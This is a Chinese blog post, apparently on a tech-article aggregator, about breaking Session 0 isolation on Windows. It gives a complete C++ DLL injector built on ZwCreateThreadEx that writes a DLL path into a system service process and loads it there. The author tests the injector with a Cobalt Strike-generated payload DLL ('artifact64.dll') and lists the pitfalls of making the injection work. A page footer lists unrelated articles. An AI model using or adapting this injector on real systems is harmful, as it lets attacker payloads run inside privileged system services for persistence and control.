远程线程注入突破SESSION 0

原創 ice_0e3 2021-09-22 14:11

远程线程注入突破SESSION 0

SESSION 0 隔离

在Windows XP、Windows Server 2003,以及更老版本的Windows操作系统中,服务和应用程序使用相同的会话(Session)运行,而这个会话是由第一个登录到控制台的用户启动的。该会话就叫做Session 0,如下图所示,在Windows Vista之前,Session 0不仅包含服务,也包含标准用户应用程序。

将服务和用户应用程序一起在Session 0中运行会导致安全风险,因为服务会使用提升后的权限运行,而用户应用程序使用用户特权(大部分都是非管理员用户)运行,这会使得恶意软件以某个服务为攻击目标,通过“劫持”该服务,达到提升自己权限级别的目的。

从Windows Vista开始,只有服务可以托管到Session 0中,用户应用程序和服务之间会被隔离,并需要运行在用户登录到系统时创建的后续会话中。例如第一个登录的用户创建 Session 1,第二个登录的用户创建Session 2,以此类推,如下图所示。

突破SESSION 0

ZwCreateThreadEx函数可以突破SESSION 0 隔离,将DLL注入到SESSION 0 隔离的系统服务进程中。CreateRemoteThread底层实际上也是通过ZwCreateThreadEx函数实现线程创建的。CreateRemoteThread注入系统进程会失败的原因是因为调用ZwCreateThreadEx创建远程线程时,第七个参数CreateThreadFlags为1。

使用CreateRemoteThread注入失败DLL失败的关键在第七个参数CreateThreadFlags, 他会导致线程创建完成后一直挂起无法恢复进程运行,导致注入失败。而想要注册成功,把该参数的值改为0即可。

ZwCreateThreadEx

ZwCreateThreadEx在 ntdll.dll 中并没有声明,所以我们需要使用 GetProcAddress 从 ntdll.dll 中获取该函数的导出地址。
我们需要注意的是64位和32位中,函数定义还不一样

64 位下,ZwCreateThreadEx 函数声明为:

DWORD WINAPI ZwCreateThreadEx(
        PHANDLE ThreadHandle,
        ACCESS_MASK DesiredAccess,
        LPVOID ObjectAttributes,
        HANDLE ProcessHandle,
        LPTHREAD_START_ROUTINE lpStartAddress,
        LPVOID lpParameter,
        ULONG CreateThreadFlags,
        SIZE_T ZeroBits,
        SIZE_T StackSize,
        SIZE_T MaximumStackSize,
        LPVOID pUnkown);

32 位下,ZwCreateThreadEx 函数声明为:

DWORD WINAPI ZwCreateThreadEx(
        PHANDLE ThreadHandle,
        ACCESS_MASK DesiredAccess,
        LPVOID ObjectAttributes,
        HANDLE ProcessHandle,
        LPTHREAD_START_ROUTINE lpStartAddress,
        LPVOID lpParameter,
        BOOL CreateSuspended,
        DWORD dwStackSize,
        DWORD dw1,
        DWORD dw2,
        LPVOID pUnkown);

编码实现

#include <Windows.h>
#include <stdio.h>
#include <iostream>

void ShowError(const char* pszText)
{
	char szErr[MAX_PATH] = { 0 };
	::wsprintf(szErr, "%s Error[%d]\n", pszText, ::GetLastError());
	::MessageBox(NULL, szErr, "ERROR", MB_OK);
}


// 使用 ZwCreateThreadEx 实现远线程注入
BOOL ZwCreateThreadExInjectDll(DWORD PID,const char* pszDllFileName)
{
	HANDLE hProcess = NULL;
	SIZE_T dwSize = 0;
	LPVOID pDllAddr = NULL;
	FARPROC pFuncProcAddr = NULL;
	HANDLE hRemoteThread = NULL;
	DWORD dwStatus = 0;
	//打开注入进程,获取进程句柄
	hProcess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
	if (hProcess == NULL) {
		printf("OpenProcess Error");
		return -1 ;
	}
	//在注入的进程申请内存地址

	dwSize = 1 + ::lstrlen(pszDllFileName);
	pDllAddr = ::VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
	if (NULL == pDllAddr)
	{
		ShowError("VirtualAllocEx");
		return FALSE;
	}
	//写入内存地址
	if (FALSE == ::WriteProcessMemory(hProcess, pDllAddr, pszDllFileName, dwSize, NULL))
	{
		ShowError("WriteProcessMemory");
		return FALSE;
	}
	//加载ntdll
	HMODULE hNtdllDll = ::LoadLibrary("ntdll.dll");
	if (NULL == hNtdllDll)
	{
		ShowError("LoadLirbary");
		return FALSE;
	}
	// 获取LoadLibraryA函数地址
	pFuncProcAddr = ::GetProcAddress(::GetModuleHandle("Kernel32.dll"), "LoadLibraryA");
	if (NULL == pFuncProcAddr)
	{
		ShowError("GetProcAddress_LoadLibraryA");
		return FALSE;
	}
	
#ifdef _WIN64
	typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
		PHANDLE ThreadHandle,
		ACCESS_MASK DesiredAccess,
		LPVOID ObjectAttributes,
		HANDLE ProcessHandle,
		LPTHREAD_START_ROUTINE lpStartAddress,
		LPVOID lpParameter,
		ULONG CreateThreadFlags,
		SIZE_T ZeroBits,
		SIZE_T StackSize,
		SIZE_T MaximumStackSize,
		LPVOID pUnkown);
#else
	typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
		PHANDLE ThreadHandle,
		ACCESS_MASK DesiredAccess,
		LPVOID ObjectAttributes,
		HANDLE ProcessHandle,
		LPTHREAD_START_ROUTINE lpStartAddress,
		LPVOID lpParameter,
		BOOL CreateSuspended,
		DWORD dwStackSize,
		DWORD dw1,
		DWORD dw2,
		LPVOID pUnkown);
#endif
	//获取ZwCreateThreadEx函数地址
	typedef_ZwCreateThreadEx ZwCreateThreadEx = (typedef_ZwCreateThreadEx)::GetProcAddress(hNtdllDll, "ZwCreateThreadEx");
	if (NULL == ZwCreateThreadEx)
	{
		ShowError("GetProcAddress_ZwCreateThread");
		return FALSE;
	}
	// 使用 ZwCreateThreadEx 创建远线程, 实现 DLL 注入
	dwStatus = ZwCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)pFuncProcAddr, pDllAddr, 0, 0, 0, 0, NULL);
	if (NULL == hRemoteThread)
	{
		ShowError("ZwCreateThreadEx");
		return FALSE;
	}
	// 关闭句柄
	::CloseHandle(hProcess);
	::FreeLibrary(hNtdllDll);

	return TRUE;


}

int main(int argc, char* argv[])
{
#ifdef _WIN64
	BOOL bRet = ZwCreateThreadExInjectDll(8, "C:\\Users\\xx\\Desktop\\pwn\\artifact64.dll");
#else 
	BOOL bRet = ZwCreateThreadExInjectDll(atoi(argv[1]), argv[2]);
#endif
	if (FALSE == bRet)
	{
		std::cout << "Inject Dll Error.\n";
	}
	std::cout << "Inject Dll OK.\n";
	return 0;
}

在这如果想通过MessageBox判断是否注入成功,那么会大失所望。由于会话隔离,在系统程序中不能显示程序窗体,也不能用常规方式来建立用户进程。所以这里使用CS生成的dll来判断DLL是否注入成功。

前面用MessageBox来判断踩坑了。

步骤总结

  1. 打开注入进程,获取进程句柄
  2. 在注入的进程申请内存地址
  3. 写入内存地址
  4. 加载ntdll,获取LoadLibraryA函数地址
  5. 获取ZwCreateThreadEx函数地址
  6. 使用 ZwCreateThreadEx 创建远线程, 实现 DLL 注入

坑点总结

  1. 需要使用管理员权限

  2. 进程注入dll使用MessageBox,会显示不了。因为系统程序中不能显示程序窗体

  3. ZwCreateThreadEx的函数定义在32和64位的不一样

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Git使用经验总结4-撤回上一次本地提交

這個問題的意義在於,Git提交代碼是先提交到本地,然後再推送到遠端。一些比較嚴格的Git倉庫會有一些代碼提交檢查,一旦檢查到問題就會禁止提交。那麼這個時候就尷尬了,本地已經提交了,但是遠端又推送不上去。基於當前版本作修改再提交也不一定能推送

harlee44 2024-05-08 14:31:14

Git使用经验总结5-修改提交信息

還是先說說這個這樣做的目的爲什麼。除了正常的進行代碼變更說明修改,更重要的是Git提交的時候能夠觸發一些操作,例如在Github上提交close#24這樣的關鍵字可以將提交關聯到具體的issue上,這樣可以讓變更關聯到具體的需求或者討論上。

harlee44 2024-05-08 14:31:14

全站变灰色样式通用

html { -webkit-filter: grayscale(100%); -moz-filter: grayscale(100%); -ms-filter: grayscale(100%); -o-filter: grayscale(

IT小白鴿 2024-05-08 14:30:44

php-strpos 判断一个字符串是否存在于另一个字符串中

在 PHP 中,你可以使用 strpos() 函數來判斷一個字符串(例如 "play")是否存在於另一個字符串中。strpos() 函數會返回子字符串在原始字符串中首次出現的位置(索引從 0 開始),如果子字符串不存在,則返回 false。

流年中渲染了微笑 2024-05-08 14:30:04

编程随想曲周刊(第75期)

這裏記錄每週的所見所聞,週日發佈。點擊閱讀原文可以直接訪問文章鏈接。 文章 看完豆瓣電影250後的體驗 羅永浩的嘴,蔚來的腿 熱點 蔡崇信最新發聲:阿里承認錯誤,我們到了最危險的時刻! 5年來首次,馬雲內網髮長文 播客 156.程

Simle 2024-05-08 14:27:23

编程随想曲周刊(第76期)

這裏記錄每週的所見所聞,週日發佈。點擊閱讀原文可以直接訪問文章鏈接。 編程 從零開始的 OpenWrt 工具 互聯網上最值得信賴的指南網站 Apple Store一條新規,直接讓遊戲機模擬器登頂了 iOS最強模擬器 Delta 正式上

Simle 2024-05-08 14:27:23

DeepFilterNet复现

大概框架 有兩路特徵,一個ERB特徵,另外一個是STFT之後的複數特徵。先使用ERB濾波器對ERB特徵進行增益,然後再傳入DNN模型,兩階段模型。 整體時延最低可達5ms。 這裏提到的DeepFilter,其實就是說用神經網絡對TF譜進行操

Kevin_naticl 2024-05-08 14:25:33

条款49:了解 new handler 的行为

    --

htj10 2024-05-08 14:21:53

同事使用 insert into select 迁移数据,开开心心上线,上线后被公司开除!

作者:xlecho 鏈接:https://juejin.cn/post/6931890118538199048 血一般的教訓,請慎用 insert into select。同事應用之後,導致公司損失了近10w元,最終被公司開除。 事情

Java技術棧 2024-05-08 14:21:32

多语言实现 - 世界语言对应的简写

準備多語言文件: messages_en.properties、messages_zh.properties Locale locale = new Locale("en", "US"); // 設置語言爲英文,地區爲美國 Re

阿 軍 2024-05-08 14:15:12

《最新出炉》系列入门篇-Python+Playwright自动化测试-44-鼠标操作-上篇

1.簡介 前邊文章中已經講解過鼠標的拖拽操作,今天宏哥在這裏對其的其他操作進行一個詳細地介紹和講解,然後對其中的一些比較常見的、重要的操作單獨拿出來進行詳細的介紹和講解。 2.鼠標操作語法 鼠標操作介紹官方API的文檔地址:https://

北京-宏哥 2024-05-08 14:14:42

Docker 安装 Elasticsearch 和 kibana

獲取鏡像 docker pull elasticsearch:8.11.4 docker pull elasticsearch:8.11.4 創建網絡 docker network create es-net 運行 es d

李*靜波 2024-05-08 14:14:21

算法~PBKDF2-SHA让密码更安全

摘要:在當今的數字世界中,密碼安全是至關重要的。爲了保護用戶密碼免受未經授權的訪問和破解,Password-Based Key Derivation Function 2 (PBKDF2)算法成爲了一種重要的工具。 在 PBKDF2 算法中

張佔嶺 2024-05-08 14:12:31

Computer Basics - Top 10 keyboard shortcuts everyone should know

REF https://www.computerhope.com/tips/tip79.htm Top 10 keyboard shortcuts(快捷鍵) everyone should know Using keyboard short

emanlee 2024-05-08 14:10:30

Computer Basics - How to use a computer keyboard

          REF https://www.computerhope.com/issues/ch001689.htm https://www.digitalunite.com/technology-guides/compute

emanlee 2024-05-08 14:10:30